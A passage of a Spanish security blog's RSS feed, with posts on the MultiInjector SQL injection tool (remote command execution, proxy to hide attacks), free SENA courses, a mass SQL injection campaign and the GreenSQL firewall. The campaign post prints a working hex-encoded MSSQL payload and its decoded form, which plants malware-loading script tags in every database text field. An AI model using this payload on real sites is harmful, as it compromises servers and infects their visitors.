href="http://www.dragonjar.org/descargate-la-wikipedia-en-espanol.xhtml" title="Descargate la Wikipedia en español">Descargate la Wikipedia en español</a></li><li><a
href="http://www.dragonjar.org/descarga-firefox-5-estable.xhtml" title="Descarga Firefox 5 Estable">Descarga Firefox 5 Estable</a></li><li><a
href="http://www.dragonjar.org/sacale-el-jugo-a-tu-conexion-de-telmex-claro-embratel-o-net.xhtml" title="Sacale el jugo a tu conexión de Telmex, Claro, Embratel o NET">Sacale el jugo a tu conexión de Telmex, Claro, Embratel o NET</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/codigo-fuente-herramienta-para-sql-injection.xhtml/feed</wfw:commentRss> <slash:comments>9</slash:comments> </item> <item><title>MultiInjector &#8211; Herramienta Automática de Inyección SQL</title><link>http://www.dragonjar.org/multiinjector-herramienta-automatica-de-inyeccion-sql.xhtml</link> <comments>http://www.dragonjar.org/multiinjector-herramienta-automatica-de-inyeccion-sql.xhtml#comments</comments> <pubDate>Mon, 22 Dec 2008 05:04:42 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Ataques]]></category> <category><![CDATA[Herramienta]]></category> <category><![CDATA[Injection]]></category> <category><![CDATA[Inyección]]></category> <category><![CDATA[MultiInjector]]></category> <category><![CDATA[python]]></category> <category><![CDATA[Shell]]></category> <category><![CDATA[SQL]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=1695</guid> <description><![CDATA[MultiInjector es una herramienta para realizar automáticamente sql injection en un sitio especificado, al ingresarle una url o una serie de estas, automáticamente comprobara si es/son vulerable/s. Algunas Características de esta Herramienta son: Recibe una lista de URL como entrada Reconoce los parámetros URL de la lista Ejecución de comandos sobre el sistema operativo a [...]]]></description> <content:encoded><![CDATA[<p
style="text-align: center;"><img
class="aligncenter" src="http://img132.imageshack.us/img132/8669/mjcl8.jpg" alt="mjcl8 MultiInjector   Herramienta Automática de Inyección SQL"  title="MultiInjector   Herramienta Automática de Inyección SQL" /></p><p><a
href="http://www.dragonjar.org/tag/multiinjector" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con MultiInjector">MultiInjector</a> es una <a
href="http://www.dragonjar.org/tag/herramienta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Herramienta">herramienta</a> para realizar automáticamente <a
href="http://www.dragonjar.org/tag/sql" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SQL">sql</a> <a
href="http://www.dragonjar.org/tag/injection" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Injection">injection</a> en un sitio especificado, al ingresarle una url o una serie de estas, automáticamente comprobara si es/son vulerable/s.</p><p><strong>Algunas Características de esta Herramienta son:<span
id="more-1695"></span><br
/> </strong></p><ul><li> Recibe una lista de URL como entrada</li><li>Reconoce los parámetros URL de la lista</li><li> Ejecución de comandos sobre el <a
href="http://www.dragonjar.org/tag/sistema" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con sistema">sistema</a> operativo a distancia que  permite xp_cmdshell en el servidor SQL, posteriormente, ejecutar  cualquier comando introducido por el usuario sobre el <a
href="http://www.dragonjar.org/tag/sistema" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con sistema">sistema</a> operativo</li><li> Conexiones paralelas configurables para aumentar la velocidad del ataque</li><li> Uso opcional de un proxy HTTP para ocultar el origen de los <a
href="http://www.dragonjar.org/tag/ataques" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ataques">ataques</a></li><li>Entre otras&#8230;</li></ul><p><strong>Los Requisitos para ejecutarla&#8230;<br
/> </strong></p><ul><li> <a
href="http://www.dragonjar.org/tag/python" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con python">Python</a> &gt;= 2.4</li><li>Pycurl (compatible con la versión de Python)</li><li>Psyco (compatible con la versión de Python)</li></ul><p><a
href="http://www.sn3akers.com/downloads/MultiInjectorV0.3.tar.gz">Puede descargar aquí MultiInjector de este enlace</a></p><p><a
href="http://chaptersinwebsecurity.blogspot.com/2008/11/multiinjector-v03-released.html">Para Mas Información click aquí.</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/repositorio-con-herramientas-de-seguridad.xhtml" title="Repositorio con Herramientas de Seguridad">Repositorio con Herramientas de Seguridad</a></li><li><a
href="http://www.dragonjar.org/webraider-explotacion-automatizada-de-aplicaciones-web.xhtml" title="WebRaider &#8211; Explotación automatizada de aplicaciones Web">WebRaider &#8211; Explotación automatizada de aplicaciones Web</a></li><li><a
href="http://www.dragonjar.org/video-ataque-de-envenamiento-de-cookies-cookie-poisoning.xhtml" title="Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)">Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)</a></li><li><a
href="http://www.dragonjar.org/como-detectar-y-prevenir-escalada-de-privilegios-en-gnulinux.xhtml" title="Como detectar  y prevenir escalada de privilegios en GNU/Linux">Como detectar  y prevenir escalada de privilegios en GNU/Linux</a></li><li><a
href="http://www.dragonjar.org/memorias-y-videos-del-asegurit-iii.xhtml" title="Memorias y Videos del Asegúr@IT III">Memorias y Videos del Asegúr@IT III</a></li><li><a
href="http://www.dragonjar.org/nuevo-ataque-de-inyeccion-de-sql-esta-comprometiendo-maquinas.xhtml" title="Nuevo ataque de Inyeccion de SQL esta comprometiendo maquinas">Nuevo ataque de Inyeccion de SQL esta comprometiendo maquinas</a></li><li><a
href="http://www.dragonjar.org/manual-de-metasploit-framework.xhtml" title="Curso Completo de Metasploit Framework">Curso Completo de Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/nmap-5-0.xhtml" title="NMap 5.50">NMap 5.50</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/multiinjector-herramienta-automatica-de-inyeccion-sql.xhtml/feed</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>cursos de programacion gratuitos en el sena virtual</title><link>http://www.dragonjar.org/cursos-gratuitos-de-programacion-sena-virtual.xhtml</link> <comments>http://www.dragonjar.org/cursos-gratuitos-de-programacion-sena-virtual.xhtml#comments</comments> <pubDate>Sat, 20 Dec 2008 18:08:28 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[aplicaciones]]></category> <category><![CDATA[Aprendizaje]]></category> <category><![CDATA[beca]]></category> <category><![CDATA[becas]]></category> <category><![CDATA[calidad de software]]></category> <category><![CDATA[Curso]]></category> <category><![CDATA[Cursos]]></category> <category><![CDATA[cursos virtuales]]></category> <category><![CDATA[Diseño]]></category> <category><![CDATA[excepciones en java]]></category> <category><![CDATA[JAVA]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[microsoft access 2000]]></category> <category><![CDATA[Nacional]]></category> <category><![CDATA[plus]]></category> <category><![CDATA[plus sofia]]></category> <category><![CDATA[Programación]]></category> <category><![CDATA[sen a]]></category> <category><![CDATA[SENA]]></category> <category><![CDATA[sena plus]]></category> <category><![CDATA[sena sofia]]></category> <category><![CDATA[sena sofia plus]]></category> <category><![CDATA[sena virtualç]]></category> <category><![CDATA[senavirtual]]></category> <category><![CDATA[sofia]]></category> <category><![CDATA[sofia plus]]></category> <category><![CDATA[SQL]]></category> <category><![CDATA[variables]]></category> <category><![CDATA[Virtual]]></category> <category><![CDATA[virtual sena]]></category> <category><![CDATA[www.senavirtual.edu.co]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=1672</guid> <description><![CDATA[cursos de programacion hay muchos, pero ninguno como los cursos de programacion gratuitos que hace el sena virtual. El SENA (Servicio Nacional de Aprendizaje), en su página www.senavirtual.edu.co o en su plataforma sena sofia plus está implementando nuevos cursos programacion virtuales, entre las temáticas de estos cursos de programacion encontramos lenguajes como JAVA, C++, modelado de [...]]]></description> <content:encoded><![CDATA[<p><strong><a
href="http://www.dragonjar.org/tag/cursos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Cursos">cursos</a> de programacion</strong> hay muchos, pero ninguno como los <em>cursos de programacion</em> gratuitos que hace el sena <a
href="http://www.dragonjar.org/tag/virtual" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Virtual">virtual</a>.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://img355.imageshack.us/img355/6241/sinttulo2cz9.jpg" alt="sinttulo2cz9 cursos de programacion gratuitos en el sena virtual"  title="cursos de programacion gratuitos en el sena virtual" /></p><p>El SENA (Servicio <a
href="http://www.dragonjar.org/tag/nacional" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Nacional">Nacional</a> de Aprendizaje), en su página <a
href="http://www.dragonjar.org/tag/wwwsenavirtualeduco" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con www.senavirtual.edu.co">www.senavirtual.edu.co</a> o en su plataforma <strong>sena <a
href="http://www.dragonjar.org/tag/sofia-plus" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con sofia plus">sofia plus</a></strong> está implementando nuevos cursos programacion virtuales, entre las temáticas de estos cursos de programacion encontramos lenguajes como JAVA, C++, modelado de <a
href="http://www.dragonjar.org/tag/datos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Datos">datos</a> y calidad de software.</p><p>Recordemos que al terminar los cursos de programacion en el sena virtual te dan un certificado del sena y entras automáticamente en la bolsa de empleo del SENA donde podrás ser llamado para trabajar en prestigiosas empresas del sector tecnológico del país.</p><p>El listado de cursos de programacion que puedes realizar en el senavirtual es el siguiente:<br
/> <span
id="more-1672"></span></p><p><script type="text/javascript">// <![CDATA[
        google_ad_client = "pub-5474472965666825"; /* DJAR - Sena Enlaces */ google_ad_slot = "3038482239"; google_ad_width = 200; google_ad_height = 90;
// ]]&gt;</script><br
/><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script><br
/> <br
/> <strong><span
style="text-decoration: underline;"><span
style="color: #000000;"><strong>Cursos de Programacion - </strong>Programación Orientada A Objetos</span></span></strong> <span
style="color: #0000ff;"><br
/> Variables y estructuras de Control en la Programación orientada a objetos: Java<br
/> Desarrollo de aplicaciones con Interfaz Gráfica, Manejo de Eventos, Clases y Objetos : Java<br
/> Desarrollo de Aplicaciones con Manejo de Datos en la Memoria- Java<br
/> Desarrollo de Aplicaciones con Manejo de Archivos de Texto y el Manejo de Excepciones en JAVA<br
/> Desarrollo de Aplicaciones con Manejo de Proceso Simultaneo y Uso de Menús: Java<br
/> Desarrollo de Applets/Aplicaciones con Uso de <a
href="http://www.dragonjar.org/tag/base-de-datos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Base de Datos">Base de Datos</a>, Redes, Servlets y Multimedia<br
/> Estructura del Lenguaje de Programación c++ ( Nivel I del cursos de programacion)<br
/> Módulos, estructura de almacenamiento y POO utilizando el lenguaje de programación C++ ( Nivel II)<br
/> Uso de clases, objetos, métodos y archivos secuenciales en POO con lenguaje de programación C++ ( Nivel III)<br
/></span><script type="text/javascript">// <![CDATA[
        google_ad_client = "pub-5474472965666825"; /* DJAR - Sena Enlaces */ google_ad_slot = "3038482239"; google_ad_width = 200; google_ad_height = 90;
// ]]&gt;</script><br
/><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script><br
/> <br
/> <strong><span
style="text-decoration: underline;"><span
style="color: #000000;">cursos de programacion - Modelado De Datos</span></span></strong><br
/> <span
class="Apple-style-span" style="color: #0000ff;">Informática: Administración de bases de datos utilizando <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a>® Access 2000</span><br
/> <span
style="color: #0000ff;"> Informática: <a
href="http://www.dragonjar.org/tag/diseno" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Diseño">Diseño</a> de bases de datos en SQL<br
/> Metodología de la Programación de Sistemas Informáticos<br
/> Estructuras de datos Lineales<br
/> Estructuras de datos No Lineales<br
/> Modelación de Sistemas &#8211; Modelación<br
/> Modelación de Sistemas &#8211; Simulación<br
/> Base de datos: Conceptuación y sistemas de Administración<br
/> Diseño de Casos de Uso<br
/> Metodologías de Análisis y Diseño de Sistemas-de la incepción al diseño de la arquitectura<br
/> Metodologías de Análisis y Diseño de Sistemas-del diseño a la implementación<br
/> Principios del análisis y diseño orientado a objetos, utilizando el estándar UML<br
/> Aplicación metodología orientada a objetos utilizando el estándar UML</span></p><p><span
style="color: #0000ff;">Para acceder a estos <a
href="http://www.dragonjar.org/cursos-virtuales-gratis-en-el-sena.xhtml">cursos de programacion</a> gratuitos del SENA solo tienes que entrar al enlace de los <a
href="http://anonym-url.com/go.php?to=http://sis.senavirtual.edu.co/oferta.php?areaid=10">cursos de programacion</a> en el sena virtual.</span></p><p
align="center"><iframe
src="http://www.youtube.com/embed/43QnhMXDDfI" frameborder="0" width="580" height="465"></iframe></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/cursos-virtuales-gratis-en-el-sena.xhtml" title="www.senavirtual.edu.co – Cursos virtuales GRATIS en el Sena">www.senavirtual.edu.co – Cursos virtuales GRATIS en el Sena</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-de-seguridad-y-redes-en-el-sena-virtual.xhtml" title="Curso Gratis de Seguridad y Redes en el Sena Virtual">Curso Gratis de Seguridad y Redes en el Sena Virtual</a></li><li><a
href="http://www.dragonjar.org/cupos-disponibles-en-el-sena.xhtml" title="Cupos disponibles en el SENA">Cupos disponibles en el SENA</a></li><li><a
href="http://www.dragonjar.org/curso-en-el-sena-virtual-sobre-auditoria-en-seguridad.xhtml" title="Curso en el Sena Virtual sobre Auditoria en Seguridad">Curso en el Sena Virtual sobre Auditoria en Seguridad</a></li><li><a
href="http://www.dragonjar.org/cursos-gratis-de-informatica-en-el-sena-virtual.xhtml" title="Sena Virtual Cursos Gratis de Informática">Sena Virtual Cursos Gratis de Informática</a></li><li><a
href="http://www.dragonjar.org/curso-gratuito-de-ingles-con-el-sena-virtual.xhtml" title="Curso Gratuito de Ingles con el Sena Virtual">Curso Gratuito de Ingles con el Sena Virtual</a></li><li><a
href="http://www.dragonjar.org/cursos-gratis-de-diseno-web-en-el-sena-virtual.xhtml" title="Cursos Gratis de Diseño Web en el Sena Virtual">Cursos Gratis de Diseño Web en el Sena Virtual</a></li><li><a
href="http://www.dragonjar.org/sena-sofia-plus.xhtml" title="SENA Sofia Plus">SENA Sofia Plus</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/cursos-gratuitos-de-programacion-sena-virtual.xhtml/feed</wfw:commentRss> <slash:comments>101</slash:comments> </item> <item><title>Nuevo ataque de Inyeccion de SQL esta comprometiendo maquinas</title><link>http://www.dragonjar.org/nuevo-ataque-de-inyeccion-de-sql-esta-comprometiendo-maquinas.xhtml</link> <comments>http://www.dragonjar.org/nuevo-ataque-de-inyeccion-de-sql-esta-comprometiendo-maquinas.xhtml#comments</comments> <pubDate>Wed, 13 Aug 2008 12:35:21 +0000</pubDate> <dc:creator>arpunk</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Injection]]></category> <category><![CDATA[SQL]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=201</guid> <description><![CDATA[Un nuevo ataque de inyección de SQL ha venido circulando la semana pasada, y parece que ha infectado algunos cientos de servidores web en la tarde del viernes pasado. Los ataques se ven similares al que se muestra a continuación, e intentan consultar por archivos aleatorios validos en el servidor web. Las tablas de sysobjects [...]]]></description> <content:encoded><![CDATA[<p
style="text-align: center;"><img
class="aligncenter" src="http://img214.imageshack.us/img214/7079/5180537378a9794389erq7.jpg" alt="5180537378a9794389erq7 Nuevo ataque de Inyeccion de SQL esta comprometiendo maquinas"  title="Nuevo ataque de Inyeccion de SQL esta comprometiendo maquinas" /></p><p>Un nuevo ataque de <a
href="http://www.dragonjar.org/tag/inyeccion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Inyección">inyección</a> de <a
href="http://www.dragonjar.org/tag/sql" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SQL">SQL</a> ha venido circulando la semana pasada, y parece que ha infectado algunos cientos de <a
href="http://www.dragonjar.org/tag/servidores" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Servidores">servidores</a> <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a> en la tarde del viernes pasado. Los <a
href="http://www.dragonjar.org/tag/ataques" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ataques">ataques</a> se ven similares al que se muestra a continuación, e intentan consultar por archivos aleatorios validos en el servidor <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a>.</p><p>Las tablas de sysobjects y syscolumns son consultadas y esto nos da una muy buena pista: las maquinas que se están atacando corren MSSQL, y se esta guardando código HTML dentro de la base de <a
href="http://www.dragonjar.org/tag/datos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Datos">datos</a>. También es posible que los servidores web con Sybase database backends sean explotables, ya que Sybase utiliza de manera muy amplia la misma sintaxis y estructura de las tablas que MSSQL <a
href="http://www.dragonjar.org/tag/server" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Server">server</a>.<span
id="more-201"></span></p><p>La sentencia SQL escanea todas las tablas de la <a
href="http://www.dragonjar.org/tag/base-de-datos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Base de Datos">base de datos</a>, insertando el código HTML del atacante en cada una de las paginas. Esto causa que el servidor web envié a los visitantes, dependiendo de su cliente web, a diferentes formas de malware que se aloja en paginas referenciadas<br
/> por el código HTML maligno. Similar al phishing, este ataque toma ventaja de que el visitante del sitio web confía en el sitio que están visitando. En vez de suplantar la identidad del sitio confiado, el sitio confiado es aquel que le envía el malware al cliente, quien tiene mayores probabilidades de aceptar.</p><p>Este tipo de ataque puede ser usado para lanzar ataques de phishing tradicionales en sitios que solicitan información financiera, o cualquier otro tipo de ataque en donde la confianza de los visitantes pueda ser explotada.</p><p>Los requests que saldrían en los logs del web server se asemejan al siguiente:</p><p>GET /?&#8217;;DECLARE%20@S%20CHAR(4000);SET%20@<br
/> S=CAST(0x4445434C41524520405420766172636<br
/> 8617228323535292C40432076617263686172283<br
/> 430303029204445434C415245205461626C655F4<br
/> 37572736F7220435552534F5220464F522073656<br
/> C65637420612E6E616D652C622E6E616D6520667<br
/> 26F6D207379736F626A6563747320612C7379736<br
/> 36F6C756D6E73206220776865726520612E69643<br
/> D622E696420616E6420612E78747970653D27752<br
/> 720616E642028622E78747970653D3939206F722<br
/> 0622E78747970653D3335206F7220622E7874797<br
/> 0653D323331206F7220622E78747970653D31363<br
/> 729204F50454E205461626C655F437572736F722<br
/> 04645544348204E4558542046524F4D202054616<br
/> 26C655F437572736F7220494E544F2040542C404<br
/> 3205748494C4528404046455443485F535441545<br
/> 5533D302920424547494E2065786563282775706<br
/> 4617465205B272B40542B275D20736574205B272<br
/> B40432B275D3D5B272B40432B275D2B2727223E3<br
/> C2F7469746C653E3C736372697074207372633D2<br
/> 2687474703A2F2F73646F2E313030306D672E636<br
/> E2F63737273732F772E6A73223E3C2F736372697<br
/> 0743E3C212D2D272720776865726520272B40432<br
/> B27206E6F74206C696B6520272725223E3C2F746<br
/> 9746C653E3C736372697074207372633D2268747<br
/> 4703A2F2F73646F2E313030306D672E636E2F637<br
/> 37273732F772E6A73223E3C2F7363726970743E3<br
/> C212D2D272727294645544348204E45585420465<br
/> 24F4D20205461626C655F437572736F7220494E5<br
/> 44F2040542C404320454E4420434C4F534520546<br
/> 1626C655F437572736F72204445414C4C4F43415<br
/> 445205461626C655F437572736F72%20AS%20CHA<br
/> R(4000));EXEC(@S);HTTP/1.1</p><p>Esta salida decodificada nos muestra la siguiente sentencia SQL (URLs han sido removidas):</p><p>DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update ['+@T+'] set ['+@C +']=['+@C+']+””&gt;<script src="”http://www.domain.com/malware/"></script><script src="”http://www.domain.com/malware/w.js"></script><p>Este ataque todavía sigue en funcionamiento hasta el día de hoy. Se ha obtenido evidencia de explotación satisfactoria a través de cientos de paginas web. Estas paginas estaban asociadas con otras paginas al rededor del mundo suplantando contenido (incluyendo sitios de gobierno, sitios de venta por Internet, sitios de información financiera, entre otros).</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/repositorio-con-herramientas-de-seguridad.xhtml" title="Repositorio con Herramientas de Seguridad">Repositorio con Herramientas de Seguridad</a></li><li><a
href="http://www.dragonjar.org/multiinjector-herramienta-automatica-de-inyeccion-sql.xhtml" title="MultiInjector &#8211; Herramienta Automática de Inyección SQL">MultiInjector &#8211; Herramienta Automática de Inyección SQL</a></li><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/revisa-la-seguridad-de-tu-sitio-web-gratis.xhtml" title="Revisa la seguridad de tu sitio web Gratis">Revisa la seguridad de tu sitio web Gratis</a></li><li><a
href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a
href="http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml" title="¿Que Mirar Cuando Auditamos una Base de Datos Oracle?">¿Que Mirar Cuando Auditamos una Base de Datos Oracle?</a></li><li><a
href="http://www.dragonjar.org/memorias-expodefensa-2009.xhtml" title="Memorias ExpoDefensa 2009">Memorias ExpoDefensa 2009</a></li><li><a
href="http://www.dragonjar.org/codigo-fuente-herramienta-para-sql-injection.xhtml" title="Código Fuente Herramienta para SQL Injection  ">Código Fuente Herramienta para SQL Injection </a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/nuevo-ataque-de-inyeccion-de-sql-esta-comprometiendo-maquinas.xhtml/feed</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>GreenSQL, Firewall de código abierto para Bases de Datos</title><link>http://www.dragonjar.org/greensql-firewall-de-codigo-abierto-para-bases-de-datos.xhtml</link> <comments>http://www.dragonjar.org/greensql-firewall-de-codigo-abierto-para-bases-de-datos.xhtml#comments</comments> <pubDate>Wed, 02 Apr 2008 01:36:43 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Bases de Datos]]></category> <category><![CDATA[Firewall]]></category> <category><![CDATA[GreenSQL]]></category> <category><![CDATA[SQL]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=305</guid> <description><![CDATA[GreenSQL es un cortafuegos diseñado para brindar protección a Bases de Datos, especificamente MySQL frente a ataques del tipo SQL injection. GreenSQL trabaja en modo proxy interviniendo las conexiones a la base de datos y evaluando los comandos SQL que se envían. Lo que hace la herramienta es evaluar los comandos SQL recibidos, basandose en [...]]]></description> <content:encoded><![CDATA[<p>GreenSQL es un cortafuegos diseñado para brindar protección a <a
href="http://www.dragonjar.org/tag/bases-de-datos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Bases de Datos">Bases de Datos</a>, especificamente <a
href="http://www.dragonjar.org/tag/mysql" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con mysql">MySQL</a> frente a <a
href="http://www.dragonjar.org/tag/ataques" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ataques">ataques</a> del tipo SQL <a
href="http://www.dragonjar.org/tag/injection" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Injection">injection</a>. GreenSQL trabaja en modo proxy interviniendo las conexiones a la <a
href="http://www.dragonjar.org/tag/base-de-datos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Base de Datos">base de datos</a> y evaluando los comandos SQL que se envían.</p><p
style="text-align: center;"><img
src="http://img150.imageshack.us/img150/8280/logo1wr5.gif" alt="logo1wr5 GreenSQL, Firewall de código abierto para Bases de Datos " width="100" height="65" title="GreenSQL, Firewall de código abierto para Bases de Datos " /></p><p>Lo que hace la <a
href="http://www.dragonjar.org/tag/herramienta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Herramienta">herramienta</a> es evaluar los comandos SQL recibidos, basandose en una lista que podemos definir como sentencias peligrosas para la integridad de nuestra aplicación Web y base de <a
href="http://www.dragonjar.org/tag/datos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Datos">datos</a>, como por ejemplo: DROP, CREATE, ALTER, INSERT, etc.<span
id="more-305"></span></p><p>Además de sus prestaciones la herramienta es distribuida bajo licencia GPL.</p><p>GreenSQL cumple su función de <a
href="http://www.dragonjar.org/tag/firewall" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Firewall">Firewall</a> bloqueando inyecciones de comandos utilizados para tareas administrativas de bases de datos. Además calcula el riesgo de cada consulta SQL bloqueando las consultas que comprometan la <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> del aplicativo Web o base de datos.</p><p>La página Web oficial del proyecto ha habilitado una sección demostrativa de la herramienta, en la cual podemos observar la efectividad del cortafuegos. Para acceder al demo solo debemos ingresar a la siguiente <a
href="http://demo.greensql.net/" target="_blank">URL</a>.</p><p><a
href="http://www.greensql.net/about" target="_blank">Más información de GreenSQL</a><br
/> <a
href="http://sourceforge.net/project/showfiles.php?group_id=199511" target="_blank">Descargar GreenSQL</a><br
/> <a
href="http://www.greensql.net/howto" target="_blank">Documentación de GreenSQL</a><br
/> <a
href="http://demo.greensql.net/login.php" target="_blank">Demo de GreenSQL</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/repositorio-con-herramientas-de-seguridad.xhtml" title="Repositorio con Herramientas de Seguridad">Repositorio con Herramientas de Seguridad</a></li><li><a
href="http://www.dragonjar.org/ssdownloader-gestor-de-descargas-para-herramientas-de-seguridad.xhtml" title="SSDownloader &#8211; Gestor de descargas para Herramientas de Seguridad">SSDownloader &#8211; Gestor de descargas para Herramientas de Seguridad</a></li><li><a
href="http://www.dragonjar.org/endian-solucion-gratis-seguridad-perimetral.xhtml" title="ENDIAN una solución gratuita de seguridad perimetral">ENDIAN una solución gratuita de seguridad perimetral</a></li><li><a
href="http://www.dragonjar.org/revisa-la-seguridad-de-tu-sitio-web-gratis.xhtml" title="Revisa la seguridad de tu sitio web Gratis">Revisa la seguridad de tu sitio web Gratis</a></li><li><a
href="http://www.dragonjar.org/revistas-hakin9-gratis.xhtml" title="Hakin9 Español GRATIS">Hakin9 Español GRATIS</a></li><li><a
href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a
href="http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml" title="¿Que Mirar Cuando Auditamos una Base de Datos Oracle?">¿Que Mirar Cuando Auditamos una Base de Datos Oracle?</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/greensql-firewall-de-codigo-abierto-para-bases-de-datos.xhtml/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 75/255 queries in 0.290 seconds using disk: basic
Object Caching 8914/9196 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-10 10:41:15 -->
